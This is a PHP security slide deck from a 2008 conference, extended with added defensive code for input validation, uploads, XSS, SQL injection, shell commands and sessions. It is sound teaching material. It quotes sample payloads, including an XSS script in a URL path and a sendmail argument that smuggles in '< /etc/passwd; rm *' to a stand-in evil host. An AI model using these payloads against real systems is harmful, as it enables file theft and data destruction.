
PHP Security

Presented at PHPCAMP Pune, 2008



  1. PHP Security, by Uttam Kumar (email: trickyuk001@gmail.com, mobile: 8149253187)
  2. What is Security? Measurement, safety, protection.
  3. Secure Web Applications
     Web security issues have to do with:
     - hacker attacks
       • denial of service
       • server hijacking
     - common threats
     - compromise of data
  4. PHP & Security: a growing language, and a major concern.
  5. Never trust the web: input data validation
     - register_globals = Off
     - $_REQUEST[] is a big no: read $_GET, $_POST or $_COOKIE explicitly, so you know where each value came from
     - type-cast input data
       • do not rely on is_numeric() for numeric data: it is locale-dependent and accepts forms such as "1e3" and leading whitespace; cast with (int) or (float) instead
       • use a regular expression for string data
     - path validation
       • always use basename()
  6. Never trust the web: content size validation
     - enforce maximum lengths on the server side; a maxlength attribute in the form is advisory only
     - file upload
       • check the uploaded size with $_FILES['name']['size']
       • the browser-supplied MIME type ($_FILES['name']['type']) is not reliable: it is set by the client and can be anything
       • for images, use getimagesize() on the uploaded file to determine the real type from its contents
     - external sources, such as an avatar fetched from a URL
       • make a local copy when a path/of/file is submitted as a URL, then validate the copy exactly like an upload
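The following is an added example, not code from the slides, that puts slides 5 and 6 into one request handler: explicit sources instead of $_REQUEST, casting and a regular expression for scalar input, basename() plus a whitelist for a file name, and an avatar accepted either as an upload or as a URL that is copied locally first and then checked with getimagesize(). The field names, the size limit, and the directories /var/www/docs and /var/www/avatars are assumptions.

```php
<?php
// Added example (not from the slides). Field names, the 100 KiB limit and
// the /var/www/... directories are assumptions for illustration.

// Read each value from the array it is expected in, never from $_REQUEST.
$age  = isset($_POST['age'])  ? $_POST['age']  : '';
$name = isset($_POST['name']) ? $_POST['name'] : '';
$file = isset($_GET['file'])  ? $_GET['file']  : '';

// Numeric input: cast rather than test with is_numeric(), which also
// accepts exponent forms and leading whitespace.
$age = (int) $age;
if ($age < 1 || $age > 150) {
    die('Invalid age');
}

// String input: a regular expression that admits only what you expect,
// with a length limit enforced here rather than by the browser.
if (!preg_match('/^[A-Za-z][A-Za-z .\'-]{0,49}$/', $name)) {
    die('Invalid name');
}

// Path input: basename() strips directory components; the whitelist then
// decides which of the remaining names may be opened at all.
$allowed = array('terms.txt', 'privacy.txt');
$file = basename($file);
if (!in_array($file, $allowed, true)) {
    die('Invalid file');
}
$content = file_get_contents('/var/www/docs/' . $file);

define('AVATAR_MAX', 100 * 1024);
define('AVATAR_DIR', '/var/www/avatars/');

// Returns the IMAGETYPE_* constant of a real GIF/JPEG/PNG file, or false.
// The decision comes from the file contents, not from $_FILES[...]['type'].
function image_type($path) {
    $info = @getimagesize($path);
    if ($info === false) {
        return false;
    }
    $ok = array(IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG);
    return in_array($info[2], $ok, true) ? $info[2] : false;
}

// Server-chosen destination name; the client's file name is never used.
function avatar_dest($type) {
    return AVATAR_DIR . sha1(uniqid(mt_rand(), true)) . image_type_to_extension($type);
}

// Upload: size checked server-side, contents checked with getimagesize().
if (isset($_FILES['avatar']) && $_FILES['avatar']['error'] === UPLOAD_ERR_OK) {
    if ($_FILES['avatar']['size'] > AVATAR_MAX) {
        die('Avatar too large');
    }
    $type = image_type($_FILES['avatar']['tmp_name']);
    if ($type === false) {
        die('Not an image');
    }
    move_uploaded_file($_FILES['avatar']['tmp_name'], avatar_dest($type));
}

// Avatar given as a URL: make a local copy, then validate the copy like an
// upload. Only http(s) is fetched; file:// or php:// here would turn the
// feature into a local file read.
if (!empty($_POST['avatar_url'])) {
    $url = $_POST['avatar_url'];
    if (filter_var($url, FILTER_VALIDATE_URL) === false
        || !in_array(parse_url($url, PHP_URL_SCHEME), array('http', 'https'), true)) {
        die('Invalid URL');
    }
    // Read at most limit+1 bytes so an oversized response is detected, not stored.
    $data = @file_get_contents($url, false, null, 0, AVATAR_MAX + 1);
    if ($data === false || strlen($data) > AVATAR_MAX) {
        die('Avatar unavailable or too large');
    }
    $tmp = tempnam(sys_get_temp_dir(), 'av');
    file_put_contents($tmp, $data);
    $type = image_type($tmp);
    if ($type === false) {
        unlink($tmp);
        die('Not an image');
    }
    rename($tmp, avatar_dest($type));
}
```

The same image_type() check runs on both paths, which is the point of "make a local copy first": once the remote file is on disk it is validated by its bytes, and the extension of the stored file is derived from what getimagesize() found, not from the URL or the upload name.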
  7. XSS attack
     - can lead to embarrassment
     - session take-over
     - password theft
     - user tracking by 3rd parties
  8. XSS attack: prevention is better than cure
     - use strip_tags() (no tag allowance, please)
     - use htmlentities() on everything echoed into the page
     - is $_SERVER safe? No; several entries are built from the request path:
       • request: /php.php/%22%3E%3Cscript%3Ealert('xss')%3c/script%3E%3cfoo
       • $_SERVER['PATH_INFO'] = /"><script>alert('xss')</script><foo
       • $_SERVER['PHP_SELF'] = /php.php/"><script>alert('xss')</script><foo
     - IP-based info
       • HTTP_X_FORWARDED_FOR is a client-supplied header too: only honor it when REMOTE_ADDR is a proxy you control
       • normalise the value with long2ip(ip2long()) so that only a well-formed address survives:
         $aIp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
         $sValidIp = long2ip(ip2long(array_pop($aIp)));
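An added example, not from the slides, showing the three points of slide 8 together: output encoding with htmlentities() (ENT_QUOTES, explicit charset) after strip_tags(), encoding $_SERVER['PHP_SELF'] before it is used as a form action, and the X-Forwarded-For handling restricted to requests that actually arrived through a trusted proxy. The proxy address 10.0.0.1 and the form field names are assumptions.

```php
<?php
// Added example (not from the slides). The proxy address and field names
// are assumptions.

// One encoding helper used for every value that reaches the page.
// ENT_QUOTES encodes both ' and "; the charset must match the page's.
function e($s) {
    return htmlentities($s, ENT_QUOTES, 'UTF-8');
}

// strip_tags() removes markup; htmlentities() renders whatever survives inert.
$comment = isset($_POST['comment']) ? $_POST['comment'] : '';
$comment = e(strip_tags($comment));

// PHP_SELF and PATH_INFO echo the request path, so they must be encoded
// like any other input. A fixed action string avoids the problem entirely.
$action = e($_SERVER['PHP_SELF']);

// Client IP: X-Forwarded-For is whatever the client sent unless a proxy we
// control appended to it, so it is only consulted when REMOTE_ADDR is that
// proxy. Returns a normalised IPv4 string, or null.
function client_ip(array $server, array $trustedProxies) {
    $ip = $server['REMOTE_ADDR'];
    if (in_array($ip, $trustedProxies, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // The proxy appends the address it saw, so the last entry is the one
        // it vouches for; earlier entries are unverified client data.
        $chain = explode(',', $server['HTTP_X_FORWARDED_FOR']);
        $ip = trim(array_pop($chain));
    }
    if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
        return null;
    }
    // Round-trip through ip2long()/long2ip() as on the slide, which yields
    // the canonical dotted form.
    return long2ip(ip2long($ip));
}

$ip = client_ip($_SERVER, array('10.0.0.1')); // 10.0.0.1: assumed reverse proxy
?>
<form action="<?php echo $action; ?>" method="post">
  <textarea name="comment"><?php echo $comment; ?></textarea>
  <p>Your address: <?php echo e((string) $ip); ?></p>
</form>
```

With the slide's request path (/php.php/"><script>...), $action is emitted as `/php.php/&quot;&gt;&lt;script&gt;...`, so the quote that was meant to break out of the attribute never reaches the HTML parser as a quote.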
  9. SQL injection
     - arbitrary query execution
     - removal of data
     - modification of existing values
     - denial of service
     - arbitrary data injection
  10. Preventing SQL injection
      - are magic quotes enough? No: they escape quotes blindly, without knowing the connection charset or the query context
      - use mysql_real_escape_string(), which is aware of the connection charset
      - use prepared statements
      - never omit the single quotes around an escaped value: an unquoted numeric value is injectable no matter how it was escaped
      - the LIKE quandary: % and _ are wildcards that quote escaping leaves alone, so escape them separately with a backslash (addslashes() is not sufficient for this)
      - avoid printing the query in error messages
      - authentication data storage
        • protect the credentials used to access the database; keep them out of the scripts themselves
        • make sure they are only loaded for the VirtualHost that needs them
  11. Authentication data storage
      Apache server configuration (/home/illa/sql.conf):
        SetEnv DB_LOGIN "login"
        SetEnv DB_PASSWD "password"
        SetEnv DB_HOST "127.0.0.7"
      httpd.conf:
        <VirtualHost iila.ws>
            Include /home/illa/sql.conf
        </VirtualHost>
      PHP file:
        $_SERVER['DB_LOGIN']
        $_SERVER['DB_PASSWD']
      A better approach is to set these under PHP's ini directives, so the credentials never appear in the environment or in phpinfo() output:
        php_admin_value mysql.default_user "login"
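An added example, not from the slides, for slides 10 and 11: credentials come from the VirtualHost environment set up on slide 11, the query uses a prepared statement so the value and the SQL travel separately, LIKE wildcards are escaped inside the bound value, and a driver error is logged rather than echoed with the query. PDO is used here because it works on every PHP version since 5.1 (the mysql_* functions the slides mention are gone in PHP 7); the database name, table and columns are assumptions.

```php
<?php
// Added example (not from the slides). Database name, table and column
// names are assumptions; the credentials come from the slide 11 SetEnv lines.

$pdo = new PDO(
    'mysql:host=' . $_SERVER['DB_HOST'] . ';dbname=app;charset=utf8',
    $_SERVER['DB_LOGIN'],
    $_SERVER['DB_PASSWD'],
    array(
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
    )
);

// Vulnerable form, for contrast: concatenation and an unquoted number, so
// even mysql_real_escape_string() would not help here.
//   $sql = "SELECT id, name FROM users WHERE id = " . $_GET['id'];

// Safe: the statement is fixed, the value is bound with a declared type.
function find_user(PDO $pdo, $id) {
    $stmt = $pdo->prepare('SELECT id, name FROM users WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetch(PDO::FETCH_ASSOC);
}

// LIKE: binding stops injection, but % and _ are still wildcards inside the
// pattern. They are backslash-escaped in the value; MySQL's default LIKE
// escape character is the backslash, so no ESCAPE clause is needed.
function search_users(PDO $pdo, $term) {
    $escaped = addcslashes($term, '%_\\');
    $stmt = $pdo->prepare('SELECT id, name FROM users WHERE name LIKE :pat');
    $stmt->bindValue(':pat', '%' . $escaped . '%', PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

try {
    $user    = find_user($pdo, isset($_GET['id']) ? $_GET['id'] : 0);
    $matches = search_users($pdo, isset($_GET['q']) ? $_GET['q'] : '');
} catch (PDOException $e) {
    // Details go to the server log only; the client never sees the query
    // or the driver message.
    error_log($e->getMessage());
    die('Database error');
}
```

A search for `100%` therefore matches names containing the literal string "100%" instead of every name starting with "100", which is the "LIKE quandary" the slide refers to.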
  12. Preventing code injection
      - path validation: validate the file name
        $sFile = "D\'sozaRes.doc";  // the backslash is what magic_quotes_gpc adds before the quote (assumed from the slide's "remove slashes" advice)
        basename($sFile);  // returns D\'sozaRes.doc on *nix
        basename($sFile);  // returns 'sozaRes.doc on win32, where \ is a directory separator
        • remove slashes (stripslashes()) before using the name
        • keep a whitelist of file names
        • use the full path
      - avoid variables in eval()
      - avoid building regular expressions from user-supplied variables
  13. Command injection
      - use escapeshellcmd() for the command string and escapeshellarg() for each argument
      - use the full path for the command
      - set CPU-time and memory limits (and a priority) for the command, e.g.:
        shell_exec("ulimit -t 20 -m 20000; /usr/bin/php test.php");
  14. Calling external programs
      <?php
      $fp = popen('/usr/sbin/sendmail -i ' . $to, 'w');
      ?>
      The user could control $to to yield:
        http://examp.com/send.php?to=evil%40evil.org+%3C+%2Fetc%2Fpasswd%3B+rm+%2A
      which would result in running the command:
        /usr/sbin/sendmail -i evil@evil.org < /etc/passwd; rm *
      A solution would be:
        $fp = popen('/usr/sbin/sendmail -i ' . escapeshellarg($to), 'w');
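An added example, not from the slides, that takes the sendmail call of slide 14 and applies all of slide 13 to it: the argument is validated as an address before escapeshellarg() is applied, a leading dash (which sendmail would parse as an option) is refused, the binary is called by full path, and a second helper shows the ulimit prefix around a PHP child process. The script path /var/www/bin/report.php and the limits are assumptions.

```php
<?php
// Added example (not from the slides). Paths and limits are assumptions.

// Sends $body to $to through sendmail. Returns true on success.
function send_mail($to, $body) {
    // Validate first: an address that passes FILTER_VALIDATE_EMAIL contains
    // no spaces, redirections or semicolons. escapeshellarg() is still
    // applied afterwards as defence in depth.
    if (filter_var($to, FILTER_VALIDATE_EMAIL) === false) {
        return false;
    }
    // "-x@evil.org" is a syntactically valid address but would be read by
    // sendmail as an option; escapeshellarg() does not prevent that.
    if ($to[0] === '-') {
        return false;
    }
    $cmd = '/usr/sbin/sendmail -i ' . escapeshellarg($to);
    $fp = popen($cmd, 'w');
    if ($fp === false) {
        return false;
    }
    fwrite($fp, "To: $to\r\nSubject: hello\r\n\r\n$body");
    return pclose($fp) === 0;
}

// Runs a helper script with a CPU and memory ceiling, as on slide 13.
// escapeshellcmd() is for a whole command string; each untrusted argument
// still gets escapeshellarg(). On Linux "ulimit -m" (RSS) is not enforced,
// so the address-space limit "-v" is used instead.
function run_report($userArg) {
    $cmd = 'ulimit -t 20 -v 200000; /usr/bin/php /var/www/bin/report.php '
         . escapeshellarg($userArg);
    return shell_exec($cmd);
}

// The slide's payload is rejected at the validation step, before any shell
// is involved.
var_dump(send_mail('evil@evil.org < /etc/passwd; rm *', 'x')); // bool(false)
```

Had validation been skipped, escapeshellarg() alone still turns the payload into the single quoted argument `'evil@evil.org < /etc/passwd; rm *'`, which sendmail treats as one (invalid) recipient; the check for a leading dash closes the remaining gap that quoting does not cover.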
  15. Securing sessions
      - weaknesses of sessions
        • server side: by default session files live in the shared /tmp, so `ls -l /tmp/sess_*` reveals session IDs and activity to anyone with shell access to the host
        • URL-based sessions: an ID carried in the URL leaks through the Referer and bookmarks, and can be planted by an attacker (session fixation)
      - solutions
        • native protection: PHP's own session settings
        • mixing security and convenience: pick checks that do not lock out legitimate users
        • secure the session storage path (session.save_path outside /tmp, not readable by other users)
        • check the browser signature (User-Agent) against the one recorded at login
        • referrer validation
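An added example, not from the slides, that applies each remedy of slide 15 in code: a private session.save_path, cookies-only session IDs so the URL exploitation does not apply, a User-Agent signature checked on every request, a fresh ID after login, and a referrer check for state-changing requests. The storage path and the expected host name are assumptions.

```php
<?php
// Added example (not from the slides). The storage path and the host name
// are assumptions.

// Store session files where other users of the host cannot list them; the
// default /tmp is world-readable, which is what makes `ls -l /tmp/sess_*`
// work. The directory is assumed to be mode 0700, owned by the web user.
ini_set('session.save_path', '/var/lib/php/sessions/myapp');

// Session ID only from the cookie: no ?PHPSESSID=... in URLs, so the ID
// cannot leak via Referer or be planted through a crafted link.
ini_set('session.use_only_cookies', 1);
ini_set('session.use_trans_sid', 0);
ini_set('session.cookie_httponly', 1);   // keeps the cookie away from script (PHP >= 5.2)
// ini_set('session.cookie_secure', 1);  // enable when the site is served over HTTPS

session_start();

// Browser signature: bind the session to the User-Agent seen when it was
// created. Returns true when the current request matches.
function check_signature() {
    $ua  = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
    $sig = sha1($ua);
    if (!isset($_SESSION['sig'])) {
        $_SESSION['sig'] = $sig;
        return true;
    }
    return $_SESSION['sig'] === $sig;
}

if (!check_signature()) {
    session_destroy();
    die('Session mismatch');
}

// After authentication, issue a fresh ID (and delete the old file) so that
// an ID an attacker knew beforehand never becomes a logged-in session.
function login_user($userId) {
    session_regenerate_id(true);
    $_SESSION['uid'] = $userId;
}

// Referrer validation for state-changing requests. The Referer header can
// be absent or set by the client, so this is a cheap extra hurdle, not a
// substitute for a per-session form token.
function check_referer($expectedHost) {
    if (empty($_SERVER['HTTP_REFERER'])) {
        return false;
    }
    return parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST) === $expectedHost;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && !check_referer('example.com')) {
    die('Request refused');
}
```

The signature check is the "security versus convenience" trade-off the slide mentions: tying the session to the User-Agent stops a stolen ID from being replayed by a different browser, but it also logs out a user whose browser updates mid-session, which is why it is used together with session_regenerate_id() rather than on its own.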
  16. Questions?
  17. Thank you!
